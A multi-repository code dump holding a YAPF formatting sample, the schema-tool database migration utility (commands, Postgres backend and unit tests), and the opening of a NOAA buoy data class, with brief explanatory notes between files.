cls.catalog_management_service_authorized.delete_catalog(
catalog_identifier=catalog_id,
)
except ApiException:
print("Catalog is already deleted.")
``` |
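The `@needscredentials` decorator used throughout these tests is defined earlier in the suite and is not shown in this excerpt. A minimal sketch of the usual pattern it follows, assuming credentials live in an external properties file (the file name here is illustrative):
```python
# Hypothetical sketch only; the suite's real decorator is defined earlier
# and may differ in detail.
import os

import pytest

config_file = 'catalog_mgmt.env'  # assumed name of the credentials file

needscredentials = pytest.mark.skipif(
    not os.path.exists(config_file),
    reason="External configuration not available, skipping tests...",
)
```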
{
"source": "jonahf/Experimental_YAPF",
"score": 3
} |
#### File: work/results/testB.py
```python
x = {
'a': 37,
'b': 42,
'c': 927
}
x = {
'aaaaaaaaaaaaaaa': 37,
'bbbbbbbbbbbbbbb': 42,
'cccccccccccc': 927,
'xxx': 37,
'xxxxxxxxxxxxxx': 42,
'xxxxxx': 927
}
y = 'hello ' 'world'
z = 'hello ' + 'world'
a = 'hello {}'.format('world')
class foo(object):
def f(self):
return 37 * -+2
def g(self, x, y=42):
return y
def f(a):
aaaaaaaaaaaaaaaaa.bbbbbbbbbbbbbbbbb(ccccccccc, ddddddddddddd,
eeeeeeeeeeeee, fffffffffffff)
def conditional_zoo(a):
# thing = x if x else y
thing = x if x else y
# variable = x if x else (y if y else (z if z else z))
variable = x if x else (y
if y else (z
if z else z))
# variable = xxxxxxxxx if xxxxxxxxx else (yyyyyyyyyyyy if yyyyyyyyyyyy else (zzzzzzzzz if zzzzzzzzz else zzzzzzzzz))
variable = xxxxxxxxx if xxxxxxxxx else (yyyyyyyyyyyy
if yyyyyyyyyyyy else
(zzzzzzzzz
if zzzzzzzzz else
zzzzzzzzz))
def island_of_many_commas():
big_ol_list = [
1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8,
9, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7,
8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0
]
# was: complicated_call([a(b).c],[a(b).c],b([c]).a(),f in a(b).c,aaaaaaaaaa)
complicated_call([a(b).c],
[a(b).c],
b([c]).a(), f in a(b).c, aaaaaaaaaa)
train_wreck_call(
1, 2,
function_call(), [4], 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5,
6, 7, {8, 9, 0, 1, 2, 3, 4, 5, 6, 7}, 8, 9, 0, 1, 2, {
3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3
}, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
{0, 1, 2, 3, 4, 5, 6}, 7, 8, 9, 0)
def incomprehensionable():
# a zoo of comprehensions to play with.
d = {n: n**2
for n in range(5)}
d = {n: True
for n in range(5)}
total_length = sum(
len(x)
for x, y in zip(strings, validity)
if y)
californian_name_lengths = sum(
len(name)
for name, zip_code in zip(names, zip_codes)
if zip_code in california_zip_codes)
some_dict = {
k: v
for k, v in [('a', 1), ('b',
2)]
if v % 2 == 0
}
set_of_vowels = {upper(i)
for i in sentence
if i in vowels}
birthdays = (day for day in list_of_days
if day.has_birthday())
birthdays = [day for day in list_of_days
if day.has_birthday()]
zvals = [
zvals[i]
for i, (a, b) in enumerate(pairs(zvals))
if b - a >= threshold
]
not_terribly_pythonic = [
i * 2
for i in [j + 1
for j in range(20)
if (j % 3) == 0]
if i * i > 19
]
for row in [[i * j
for i in range(1, 8)]
for j in range(1, 4)]:
print row
return ("\n".join(
str(i) + ":\t" + "*" * a.count(i)
for i in range(min(a), max(a) + 1)))
class VeryIndented(object):
def list_comprehensions():
if True:
if True:
if True:
if True:
if True:
# now that we're indented a lot, let's see what happens
test_comp = [
x for x in [y
for y in iterable
if cond(y)]
if cond(x)
]
test_comp = [
xxxxxxxxxxx
for xxxxxxxxxxx in [
yyyyyyyyyy for yyyyyyyyyy in iterable
if cond(yyyyyyyyyy)
]
if cond(xxxxxxxxxxx)
]
class AClass(object):
def list_comprehensions():
# was: test_comp = [x for x in [y for y in iterable if cond(y)] if cond(x)]
test_comp = [
x for x in [y
for y in iterable
if cond(y)]
if cond(x)
]
# was: test_comp = [xxx for xxx in [yyy for yyy in iterable if cond(yyy)] if cond(xxx)]
test_comp = [
xxx for xxx in [yyy
for yyy in iterable
if cond(yyy)]
if cond(xxx)
]
# was: test_comp = [xxxxxx for xxxxxx in [yyyyyy for yyyyyy in iterable if cond(yyyyyy)] if cond(xxxxxx)]
test_comp = [
xxxxxx for xxxxxx in
[yyyyyy for yyyyyy in iterable
if cond(yyyyyy)]
if cond(xxxxxx)
]
# was: test_comp = [xxxxxxxxx for xxxxxxxxx in [yyyyyyyy for yyyyyyyy in iterable if cond(yyyyyyyy)] if cond(xxxxxxxxx)]
test_comp = [
xxxxxxxxx
for xxxxxxxxx in
[yyyyyyyy for yyyyyyyy in iterable
if cond(yyyyyyyy)]
if cond(xxxxxxxxx)
]
# was: test_comp = [xxxxxxxxxxx for xxxxxxxxxxx in [yyyyyyyyyy for yyyyyyyyyy in iterable if cond(yyyyyyyyyy)] if cond(xxxxxxxxxxx)]
test_comp = [
xxxxxxxxxxx
for xxxxxxxxxxx in [
yyyyyyyyyy for yyyyyyyyyy in iterable
if cond(yyyyyyyyyy)
]
if cond(xxxxxxxxxxx)
]
``` |
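The file above is sample output from an experimental YAPF configuration. For readers who want to reproduce reformatting programmatically, yapf ships a `FormatCode` helper; a minimal sketch follows (the `pep8` style here is illustrative, not the style that produced the output above):
```python
# Reformat a source string with yapf's programmatic API.
from yapf.yapflib.yapf_api import FormatCode

source = "x = {   'a':37,'b':42,\n'c':927}\n"
formatted, changed = FormatCode(source, style_config='pep8')
print(formatted)  # the reformatted source text
print(changed)    # True if yapf changed the input
```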
{
"source": "jonahgeorge/schema-tool",
"score": 3
} |
#### File: schematool/command/check.py
```python
from optparse import OptionParser
import os
import re
# local imports
from command import Command
from constants import Constants
from errors import MissingDownAlterError, MissingUpAlterError, MissingRefError
from util import ChainUtil
class CheckCommand(Command):
def init_parser(self):
usage = "schema check [options]"
parser = OptionParser(usage=usage)
parser.add_option('-v', '--verbose',
action='store_true', dest='verbose', default=False,
help='Enable verbose message output')
self.parser = parser
def run(self, inline=False):
"""
Check that the alter chain is valid
"""
# TODO Check that the alter chain is in line with the DB (but not necessarily up to date)
# TODO Make the verbose flag do something based on previous additions
# TODO Add flags to only perform certain checks (as described in the other todos)
if not inline:
# (options, args) = self.parser.parse_args()
self.parser.parse_args()
self.files = ChainUtil.get_alter_files()
# implicitly check validity of chain (integrity check)
chain = ChainUtil.build_chain()
# all other checks
self.check_abandoned_alters(chain)
self.check_missing_pair()
if not inline:
print("Everything looks good!\n")
def check_abandoned_alters(self, chain):
"""
Check for files that do not exist within the current alter chain.
"""
tail = chain
chain_files = []
while tail is not None:
chain_files.append(tail.filename)
tail = tail.backref
up_alter = re.compile('-up.sql')
for alter_file in self.files:
if up_alter.search(alter_file) is not None:
if alter_file not in chain_files:
# @jmurray - how can this scenario be encountered?
raise MissingRefError("File not found within build-chain '%s'" % alter_file)
def check_missing_pair(self):
"""
Check for any alters that have an up, but not a down and vice-versa
"""
up_alter = re.compile('-up.sql')
down_alter = re.compile('-down.sql')
for alter_file in self.files:
if up_alter.search(alter_file) is not None:
down_file = up_alter.sub('-down.sql', alter_file)
if not os.path.exists(os.path.join(Constants.ALTER_DIR, down_file)):
raise MissingDownAlterError("no down-file found for '%s', expected '%s'\n" % (
alter_file, down_file))
elif down_alter.search(alter_file) is not None:
up_file = down_alter.sub('-up.sql', alter_file)
if not os.path.exists(os.path.join(Constants.ALTER_DIR, up_file)):
raise MissingUpAlterError("no up-file found for '%s', expected '%s'\n" % (
alter_file, up_file))
```
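As a usage sketch, `CheckCommand` can also be driven from other code through its `inline` flag; the context setup below mirrors the unit tests later in this document and is an assumption of the example:
```python
# Illustrative only: run the chain checks programmatically.
from command import CommandContext, CheckCommand
from errors import (MissingDownAlterError, MissingUpAlterError,
                    MissingRefError)

context = CommandContext.via({'type': 'memory-db'})
try:
    # inline=True skips argv parsing and the final success message
    CheckCommand(context).run(inline=True)
except (MissingDownAlterError, MissingUpAlterError, MissingRefError) as e:
    print('alter chain is broken: %s' % e)
```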
#### File: schematool/command/gen_sql.py
```python
from optparse import OptionParser
import os
import sys
# local imports
from command import Command
from constants import Constants
from errors import MissingRefError, ReadError
from util import ChainUtil
class GenSqlCommand(Command):
"""
This command is mainly intended for DBAs as a way to use the tool to
generate SQL for various alters that they need to run. This command
will take care of generating statements for the transaction free-time
table as well as ensuring that alters for revisions are inserted into
the revision database's history table.
# TODO@jmurray - is the comment about transaction free-time still relevant?
"""
def init_parser(self):
usage = ("schema gen-sql [options] [ref [ref [...]]]\n"
" If no refs are specified, all refs will be used.")
parser = OptionParser(usage=usage)
parser.add_option('-R', '--no-revision',
action='store_false', dest='gen_revision', default=True,
help='Do not print out the revision-history alter statements')
parser.add_option('-S', '--no-sql',
action='store_false', dest='gen_sql', default=True,
help='Do not generate SQL for the actual alters, just revision inserts')
parser.add_option('-d', '--down',
action='store_true', dest='down_alter', default=False,
help='Generate SQL for down-alter instead of up (default)')
parser.add_option('-q', '--include-rev-query',
action='store_true', dest='include_rev_query', default=False,
help='Include the revision query in the generated SQL')
parser.add_option('-w', '--write-to-file',
action='store_true', dest='write_to_file', default=False,
help=('Do not print to stdout. Instead, write SQL to file in '
'\'static_alter_dir\' directory from config.json. Implies '
'-q/--include-rev-query'))
self.parser = parser
def _setup_static_alter_dir(self):
if self.config.get('static_alter_dir') is None:
return
if not os.path.exists(self.config['static_alter_dir']):
os.makedirs(self.config['static_alter_dir'])
def run(self):
(options, args) = self.parser.parse_args()
# validate static_alter_dir set if flag used
if options.write_to_file:
options.include_rev_query = True
if self.config.get('static_alter_dir') is None:
raise Exception('static_alter_dir must be set in config.json to'
'\nuse -w/--write-to-file flag')
self._setup_static_alter_dir()
refs = args
nodes = ChainUtil.build_chain()
ref_nodes = []
if len(refs) == 0:
# entire chain
refs = self._get_node_ids(nodes)
refs.reverse()
# validate valid refs
for ref in refs:
node = self._find_ref(ref, nodes)
if node is False:
raise MissingRefError("Ref '%s' could not be found" % ref, self.parser.format_help())
else:
ref_nodes.append(node)
# gen SQL for each ref
if options.write_to_file:
# gen SQL for each ref, and save to individual files.
for node in ref_nodes:
sql = self.gen_sql_for_reflist([node], options)
if options.down_alter:
filename = node.down_filename()
else:
filename = node.filename
fobj = open(os.path.join(self.config['static_alter_dir'], filename), 'w')
fobj.write(sql)
fobj.close()
print os.path.join(self.config['static_alter_dir'], filename)
else:
# gen SQL for refs in one call
sql = self.gen_sql_for_reflist(ref_nodes, options)
sys.stdout.write(sql)
def _get_node_ids(self, nodes):
result = []
tail = nodes
while tail is not None:
result.append(tail.id)
tail = tail.backref
return result
def _find_ref(self, ref, nodes):
"""
Given a revision (from the command line), check to see if it exists within
the set of nodes (working backwards). If it does, return the node, else false.
"""
tail = nodes
while tail is not None:
if tail.id == ref:
return tail
tail = tail.backref
return False
def gen_sql_for_reflist(self, ref_nodes, options):
"""
Given a set of ref nodes, generate the SQL for each in order.
"""
sql = ''
# If only one alter is being processed, there is no reason to add newlines.
add_newlines = len(ref_nodes) > 1
for node in ref_nodes:
sql += self._gen_sql_for_ref(node, options, add_newlines)
sql = sql.rstrip() + "\n"
return sql
def _gen_sql_for_ref(self, node, options, add_newlines):
"""
Generate SQL for a single node (ref) according to the command-line options.
"""
sql = ''
if options.gen_sql:
try:
sql_file = None
if options.down_alter:
sql_file = open(os.path.join(Constants.ALTER_DIR, node.down_filename()))
else:
sql_file = open(os.path.join(Constants.ALTER_DIR, node.filename))
sql = sql_file.read()
except OSError, ex:
if 'sql_file' in locals():
sql_file.close()
raise ReadError("could not read file '%s'.\n\t=>%s\n" % (os.path.join(Constants.ALTER_DIR, node.filename), ex))
if options.include_rev_query or options.gen_revision:
if options.down_alter:
rev_query = self.db.get_remove_commit_query(node.id)
else:
rev_query = self.db.get_append_commit_query(node.id)
if options.include_rev_query:
sql += '\n\n-- start rev query\n%s;\n-- end rev query\n' % rev_query.encode('utf-8')
else:
sql += (rev_query + ';')
if add_newlines:
sql += "\n\n"
return sql
```
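A short sketch of driving the command programmatically; the ref id is hypothetical and the context setup again mirrors the tests later in this document:
```python
# Illustrative only: print the up-SQL plus revision insert for one ref.
import sys

from command import CommandContext, GenSqlCommand

context = CommandContext.via({'type': 'memory-db'})
# optparse reads sys.argv[1:], so index zero is a dummy executable name
sys.argv = ['', '-q', 'some-ref-hash']  # hypothetical ref id
GenSqlCommand(context).run()
```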
#### File: schematool/db/db.py
```python
import subprocess
import sys
# local imports
from errors import AppliedAlterError
# TODO: Move connection management to schema.py. Instantiate a connection
# before each run() method and close it at the end, using the DB.conn() method.
class Db(object):
"""
Do not instantiate directly.
Contains all the methods related to initialization of the environment that the
script will be running in.
"""
@classmethod
def new(cls, config):
cls.config = config
cls.conn_initialized = False
return cls
@classmethod
def init(cls, force=False):
"""
Make sure that the table to track revisions is there.
"""
if force:
sys.stdout.write('Removing existing history')
cls.drop_revision()
sys.stdout.write('Creating revision database\n')
cls.create_revision()
sys.stdout.write('Creating history table\n')
cls.create_history()
sys.stdout.write('DB Initialized\n')
@classmethod
def run_up(cls, alter, force=False, verbose=False):
"""
Run the up-alter against the DB
"""
sys.stdout.write('Running alter: %s\n' % alter.filename)
filename = alter.abs_filename()
cls._run_file(filename=filename, exit_on_error=not force, verbose=verbose)
cls.append_commit(ref=alter.id)
@classmethod
def run_down(cls, alter, force=False, verbose=False):
"""
Run the down-alter against the DB
"""
sys.stdout.write('Running alter: %s\n' % alter.down_filename())
filename = alter.abs_filename(direction='down')
cls._run_file(filename=filename, exit_on_error=not force, verbose=verbose)
cls.remove_commit(ref=alter.id)
@classmethod
def _run_file(cls, filename, exit_on_error=True, verbose=False):
# Used for testing to simulate an error in the running of an alter file
if getattr(cls, 'auto_throw_error', False) and 'error' in filename:
command, my_env, stdin_stream = cls.run_file_cmd_with_error(filename)
else:
command, my_env, stdin_stream = cls.run_file_cmd(filename)
if stdin_stream:
proc = subprocess.Popen(command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=my_env)
script = open(filename)
out, err = proc.communicate(script.read())
else:
proc = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=my_env)
out, err = proc.communicate()
if err:
sys.stderr.write("\n----------------------\n")
sys.stderr.write(out.rstrip())
sys.stderr.write(err.rstrip())
sys.stderr.write("\n----------------------\n")
if not proc.returncode == 0:
sys.stderr.write('Error')
if verbose:
sys.stderr.write("\n----------------------\n")
sys.stderr.write(out.rstrip())
sys.stderr.write(err.rstrip())
sys.stderr.write("\n----------------------\n")
sys.stderr.write("\n")
if exit_on_error:
raise AppliedAlterError('%s execution unsuccessful' % filename)
@classmethod
def get_applied_alters(cls):
results = cls.execute('SELECT alter_hash FROM %s' % cls.full_table_name)
alters_hashes = [result[0] for result in results]
return alters_hashes
```
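Concrete backends (such as the Postgres implementation below, or the in-memory database used by the tests) subclass `Db` and provide the execution hooks. An illustrative skeleton of that contract, with hypothetical names:
```python
# Hypothetical backend skeleton; method names follow the hooks that
# Db._run_file and the command classes rely on.
from db import Db

class SqliteDb(Db):
    @classmethod
    def run_file_cmd(cls, filename):
        # command to run, env vars for it, and a stream piped to stdin
        return ['sqlite3', 'schema.db'], None, open(filename)

    @classmethod
    def execute(cls, query, data=None):
        # backend-specific cursor handling goes here
        raise NotImplementedError
```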
#### File: schematool/db/_pg.py
```python
import os
try:
import psycopg2
import psycopg2.extras
except ImportError:
pass
# local imports
from db import Db
from errors import DbError
class PostgresDb(Db):
DEFAULT_PORT=5432
@classmethod
def new(cls, config):
super(PostgresDb, cls).new(config)
if 'revision_schema_name' in cls.config:
cls.history_table_name = cls.config['history_table_name']
cls.full_table_name = '"%s"."%s"' % (cls.config['revision_schema_name'],
cls.config['history_table_name'])
else:
raise DbError('No schema found in config file. Please add one with the key: '
'revision_schema_name')
return cls
@classmethod
def init_conn(cls):
try:
psycopg2
except NameError:
raise DbError('Postgres module not found/loaded. Please make sure psycopg2 is installed\n')
cls.conn = cls.conn()
cls.cursor = cls.conn.cursor()
cls.conn_initialized = True
return cls
@classmethod
def execute(cls, query, data=None):
if not cls.conn_initialized:
cls.init_conn()
try:
cursor = cls.cursor
cursor.execute('SET search_path TO %s' % cls.config['schema_name'])
if data:
cursor.execute(query, data)
else:
cursor.execute(query)
results = []
# If rowcount == 0, just return None.
#
# Note from psycopg2 docs:
#
# The rowcount attribute specifies the number of rows that the
# last execute*() produced (for DQL statements like SELECT) or
# affected (for DML statements like UPDATE or INSERT).
#
# http://initd.org/psycopg/docs/cursor.html
#
# Thus, it is possible that fetchone/fetchall will fail despite
# rowcount being > 0. That error is caught below and None is
# returned.
if cursor.rowcount > 0:
try:
results = cursor.fetchall()
except psycopg2.ProgrammingError, e:
if str(e) != 'no results to fetch':
raise psycopg2.ProgrammingError(e.message)
cls.conn.commit()
return results
except Exception, e:
raise DbError('Psycopg2 execution error: %s\n. Query: %s - Data: %s\n.'
% (e.message, query, str(data)))
@classmethod
def drop_revision(cls):
return cls.execute('DROP SCHEMA IF EXISTS %s' % cls.config['revision_schema_name'])
@classmethod
def create_revision(cls):
# Executing 'CREATE SCHEMA IF NOT EXISTS' fails if the user does not
# have schema creation privileges, even if the schema already exists.
# The correct action is to break this method into two parts: checking
# if the schema exists, and then creating it only if it does not.
#
# The 'IF NOT EXISTS' flag is still used in case the database is
# created after the existence check but before the CREATE statement.
check = "SELECT EXISTS(SELECT 1 FROM pg_namespace WHERE nspname = %s)"
result = cls.execute(check, [cls.config['revision_schema_name']])
if result[0] == (True,):
return
else:
return cls.execute('CREATE SCHEMA IF NOT EXISTS %s' % cls.config['revision_schema_name'])
@classmethod
def get_commit_history(cls):
return cls.execute('SELECT id, alter_hash, ran_on FROM %s' % cls.full_table_name)
@classmethod
def append_commit(cls, ref):
return cls.execute('INSERT INTO %s (alter_hash) VALUES (%s)' % (cls.full_table_name, '%s'),
(ref,))
@classmethod
def get_append_commit_query(cls, ref):
return "INSERT INTO %s (alter_hash, ran_on) VALUES ('%s', NOW())" % (cls.full_table_name, ref)
@classmethod
def remove_commit(cls, ref):
return cls.execute('DELETE FROM %s WHERE alter_hash = %s' % (cls.full_table_name, '%s'),
(ref,))
@classmethod
def get_remove_commit_query(cls, ref):
return "DELETE FROM %s WHERE alter_hash = '%s'" % (cls.full_table_name, ref)
@classmethod
def create_history(cls):
return cls.execute("""CREATE TABLE IF NOT EXISTS %s (
id serial NOT NULL,
alter_hash VARCHAR(100) NOT NULL,
ran_on timestamp NOT NULL DEFAULT current_timestamp,
CONSTRAINT pk_%s__id PRIMARY KEY (id),
CONSTRAINT uq_%s__alter_hash UNIQUE (alter_hash)
)""" % (cls.full_table_name, cls.history_table_name, cls.history_table_name))
@classmethod
def conn(cls):
"""
return the postgres connection handle to the configured server
"""
config = cls.config
try:
# conn_string here
conn_string_parts = []
conn_string_params = []
for key, value in config.iteritems():
# Build connection string based on what is defined in the config
if value:
if key == 'host':
conn_string_parts.append('host=%s')
conn_string_params.append(value)
elif key == 'username':
conn_string_parts.append('user=%s')
conn_string_params.append(value)
elif key == 'password':
conn_string_parts.append('password=%s')
conn_string_params.append(value)
elif key == 'revision_db_name':
conn_string_parts.append('dbname=%s')
conn_string_params.append(value)
elif key == 'port':
conn_string_parts.append('port=%s')
conn_string_params.append(value)
conn_string = ' '.join(conn_string_parts) % tuple(conn_string_params)
conn = psycopg2.connect(conn_string)
except Exception, e:
raise DbError("Cannot connect to Postgres Db: %s\n"
"Ensure that the server is running and you can connect normally"
% e.message)
return conn
@classmethod
def run_file_cmd(cls, filename):
"""
return a 3-tuple containing:
the command to run (list)
environment variables to be passed to command (dictionary or None)
data to be piped into stdin (file-like object or None)
"""
port_number = str(cls.config.get('port', PostgresDb.DEFAULT_PORT))
cmd = ['psql',
'-h', cls.config['host'],
'-U', cls.config['username'],
'-p', port_number,
'-v', 'verbose',
'-v', 'ON_ERROR_STOP=1',
'-v', 'schema=%s' % cls.config['schema_name'],
cls.config['db_name']]
my_env = None
if 'password' in cls.config:
my_env = os.environ.copy()
my_env['PGPASSWORD'] = cls.config['password']
return cmd, my_env, open(filename)
```
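For reference, the loop in `conn()` above produces a space-separated libpq connection string. A distilled sketch with illustrative config values:
```python
# Distilled from PostgresDb.conn(); config values are illustrative.
config = {
    'host': 'localhost',
    'username': 'schema_user',
    'password': 's3cret',
    'revision_db_name': 'revisions',
    'port': 5432,
}
key_map = {'host': 'host', 'username': 'user', 'password': 'password',
           'revision_db_name': 'dbname', 'port': 'port'}
parts, params = [], []
for key, value in config.items():
    if value and key in key_map:
        parts.append('%s=%%s' % key_map[key])
        params.append(value)
conn_string = ' '.join(parts) % tuple(params)
# e.g. "host=localhost user=schema_user password=s3cret dbname=revisions port=5432"
print(conn_string)
```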
#### File: test/commands/down.py
```python
import os
import sys
import unittest
# src imports
import_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../schematool')
sys.path.append(import_path)
from command import CommandContext, DownCommand
from db import MemoryDb
from errors import MissingRefError
# test util imports
import_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../util')
sys.path.append(import_path)
from alter_util import AlterUtil
from env_util import EnvironmentUtil
from test_util import make_argv
class DownTest(unittest.TestCase):
def setUp(self):
EnvironmentUtil.setup_fresh_test_env()
self.context = CommandContext.via({
'type': 'memory-db'})
self.downCommand = DownCommand(self.context)
def tearDown(self):
EnvironmentUtil.teardown_fresh_test_env()
def test_all_undoes_all_current_alters_when_none(self):
self.assertEqual(len(MemoryDb.data), 0)
sys.argv = make_argv(['all'])
self.downCommand.run()
self.assertEqual(len(MemoryDb.data), 0)
def test_all_undoes_all_current_alters_when_alters(self):
AlterUtil.create_alters([1])
AlterUtil.run_alters()
self.assertEqual(len(MemoryDb.data), 1)
sys.argv = make_argv(['all'])
self.downCommand.run()
self.assertEqual(len(MemoryDb.data), 0)
def test_ref_undoes_all_alters_including_ref(self):
AlterUtil.create_alters([1,2,3])
ids = AlterUtil.run_alters()
self.assertEqual(len(MemoryDb.data), 3)
sys.argv = make_argv([str(ids[1])])
self.downCommand.run()
self.assertEqual(len(MemoryDb.data), 1)
def test_ref_undoes_nothing_when_ref_doesnt_exist(self):
AlterUtil.create_alters([1, 2, 3, 4])
AlterUtil.run_alters()
self.assertEqual(len(MemoryDb.data), 4)
sys.argv = make_argv([str(10)])
try:
self.downCommand.run()
except MissingRefError:
pass
self.assertEqual(len(MemoryDb.data), 4)
def test_base_undoes_all_but_last_when_more_than_one(self):
AlterUtil.create_alters([1, 2])
AlterUtil.run_alters()
self.assertEqual(len(MemoryDb.data), 2)
sys.argv = make_argv(['base'])
self.downCommand.run()
self.assertEqual(len(MemoryDb.data), 1)
def test_base_undoes_none_when_no_alters(self):
self.assertEqual(len(MemoryDb.data), 0)
sys.argv = make_argv(['base'])
self.downCommand.run()
self.assertEqual(len(MemoryDb.data), 0)
def test_base_undoes_none_when_one_alter(self):
AlterUtil.create_alters([1])
AlterUtil.run_alters()
self.assertEqual(len(MemoryDb.data), 1)
sys.argv = make_argv(['base'])
self.downCommand.run()
self.assertEqual(len(MemoryDb.data), 1)
def test_n_option_runs_down_given_number_of_alters(self):
AlterUtil.create_alters([1, 2, 3, 4])
AlterUtil.run_alters()
self.assertEqual(len(MemoryDb.data), 4)
sys.argv = make_argv(['-n2'])
self.downCommand.run()
self.assertEqual(len(MemoryDb.data), 2)
if __name__ == '__main__':
unittest.main()
```
#### File: test/commands/new.py
```python
import os
import sys
import unittest
from time import sleep
# schematool imports
import_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../schematool')
sys.path.append(import_path)
from command import CommandContext, NewCommand
from util import ChainUtil
# test util imports
import_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../util')
sys.path.append(import_path)
from env_util import EnvironmentUtil
from test_util import make_argv
class NewTest(unittest.TestCase):
def setUp(self):
EnvironmentUtil.setup_fresh_test_env()
self.context = CommandContext.via({
'type': 'memory-db'})
self.newCommand = NewCommand(self.context)
def tearDown(self):
EnvironmentUtil.teardown_fresh_test_env()
def test_create_down(self):
sys.argv = make_argv(['-f', 'test-file'])
self.newCommand.run()
files = os.walk(os.getcwd()).next()[2]
files = [f for f in files if not f.find('test-file') == -1]
files = [f for f in files if not f.find('down') == -1]
self.assertTrue(len(files) == 1)
def test_create_up(self):
sys.argv = make_argv(['-f', 'test-file'])
self.newCommand.run()
files = os.walk(os.getcwd()).next()[2]
files = [f for f in files if not f.find('test-file') == -1]
files = [f for f in files if not f.find('up') == -1]
self.assertTrue(len(files) == 1)
def test_creates_two_files_on_new(self):
sys.argv = make_argv(['-f', 'test-file'])
self.newCommand.run()
files = os.walk(os.getcwd()).next()[2]
files = [f for f in files if not f.find('test-file') == -1]
self.assertTrue(len(files) == 2)
def test_create_files_without_name(self):
sys.argv = make_argv([])
self.newCommand.run()
files = os.walk(os.getcwd()).next()[2]
files = [f for f in files if not f.find('sql') == -1]
self.assertTrue(len(files) == 2)
def test_creates_proper_alter_chain(self):
sys.argv = make_argv(['-f', '1'])
self.newCommand.run()
sleep(0.15)
sys.argv = make_argv(['-f', '2'])
self.newCommand.run()
chain_tail = ChainUtil.build_chain()
self.assertTrue(chain_tail.backref is not None)
self.assertTrue(chain_tail.backref.backref is None)
def test_no_backref_on_single_alter(self):
sys.argv = make_argv(['-f', '1'])
self.newCommand.run()
chain_tail = ChainUtil.build_chain()
self.assertTrue(chain_tail.backref is None)
if __name__ == '__main__':
unittest.main()
```
#### File: test/util/test_util.py
```python
def make_argv(argv):
# sys.argv[0] is the name of the executable - i.e. "foo" in "./foo bar".
# Since schematool methods receive args from the command line, correctly
# mocking sys.argv requires inserting a dummy value at index zero.
return [''] + argv
``` |
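For example, mocking the command line `schema down all` from a test (as the command tests above do) looks like:
```python
import sys

from test_util import make_argv

# Equivalent to typing `schema down all` on the command line:
sys.argv = make_argv(['all'])
assert sys.argv == ['', 'all']
```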
{
"source": "jonahgolden/buoy-buddy",
"score": 3
} |
#### File: app/buoy/buoy.py
```python
import pandas as pd
import re # For metadata parsing
from .datascrapers import RealtimeScraper
from .datascrapers import HistoricalScraper
class Buoy:
def __init__(self, buoy_id, data_dir="buoydata/"):
self.buoy_id = str(buoy_id)
self.metadata = self._get_metadata()
self.data_dir = data_dir
self.realtime = RealtimeScraper(self.buoy_id, data_dir)
self.historical = HistoricalScraper(self.buoy_id, data_dir)
@staticmethod
def get_buoys():
'''Get all available buoys. Returns pandas dataframe with buoy ids as index.'''
STATIONS_URL = "https://www.ndbc.noaa.gov/data/stations/station_table.txt"
# Get and format all stations info
stations = pd.read_csv(STATIONS_URL, delimiter = "|", index_col = 0).iloc[1:,:]
stations.index.name = 'station_id'
stations.columns = ['owner', 'ttype', 'hull', 'name', 'payload', 'location', 'timezone', 'forecast', 'note']
return stations
### On Init methods
def _get_metadata(self):
''' Helper method to populate metadata field with relevant information. '''
stations = self.get_buoys()
# Check if buoy id is valid
if self.buoy_id not in stations.index:
raise ValueError("{} is not a valid buoy id. Use static method Buoy.get_buoys() to get dataframe of all buoys.".format(self.buoy_id))
# Populate metadata
buoy_info = stations.loc[self.buoy_id,:]
metadata = {}
metadata['buoy_id'] = self.buoy_id
metadata['owner'] = self._get_owner_name(buoy_info['owner'])
metadata['ttype'] = buoy_info['ttype']
metadata['hull'] = buoy_info['hull']
metadata['name'] = buoy_info['name']
metadata['timezone'] = buoy_info['timezone']
metadata['forecast'] = buoy_info['forecast'] # More Forecasts: https://www.ndbc.noaa.gov/data/DAB_Forecasts/46087fc.html, https://www.ndbc.noaa.gov/data/Forecasts/
metadata['note'] = buoy_info['note']
# metadata['available historical'] = {"dtype":[years]}
# Latitude and Longitude parsing
lat_match = re.search(r'([0-9]{1,3}\.[0-9]{3}) ([NS])', buoy_info['location'])
lat = lat_match.group(1)
if lat_match.group(2) == 'S':
lat = '-' + lat
metadata['latitude'] = lat
lng_match = re.search(r'([0-9]{1,3}\.[0-9]{3}) ([WE])', buoy_info['location'])
lng = lng_match.group(1)
if lng_match.group(2) == 'W':
lng = '-' + lng
metadata['longitude'] = lng
return metadata
def _get_owner_name(self, owner_code):
''' Metadata helper function gets a buoy owner's full name based on buoy owner code. '''
OWNERS_URL = "https://www.ndbc.noaa.gov/data/stations/station_owners.txt"
try:
owners = pd.read_csv(OWNERS_URL, delimiter="|", skiprows=1, index_col=0)
owner = owners.loc["{:<3}".format(owner_code), :]
return "{}, {}".format(owner[0].rstrip(), owner[1].rstrip())
except:
return 'NaN'
### Getting Data methods
def get_realtime_dtypes(self):
'''Returns list of available realtime data types for this buoy.'''
return self.realtime.get_available_dtypes()
def get_historical_dtypes(self, dtypes=[], years=[], months=[]):
'''
Returns dict of available historical data types for this buoy based on inputs.
Note: Depending on inputs, this method is quite slow. TODO Make it faster.
Inputs :
dtypes : Optional. List of dtype strings to get available months and years for. Default is all dtypes.
years : Optional. List of year ints to get available dtypes for.
months : Optional. List of month ints to get available dtypes for.
Output :
dictionary representing available historical data based on inputs.
'''
available = {}
# If no inputs are provided, get all available data types.
if len(dtypes) == 0 and len(years) == 0 and len(months) == 0:
dtypes = self.historical.DTYPES
for dtype in dtypes:
available[dtype] = {}
available[dtype]['months']=self.historical._available_months(dtype)
available[dtype]['years']=self.historical._available_years(dtype)
if len(years) > 0:
available['years'] = {}
for year in years:
available['years'][year] = self.historical._available_dtypes_year(year)
if len(months) > 0:
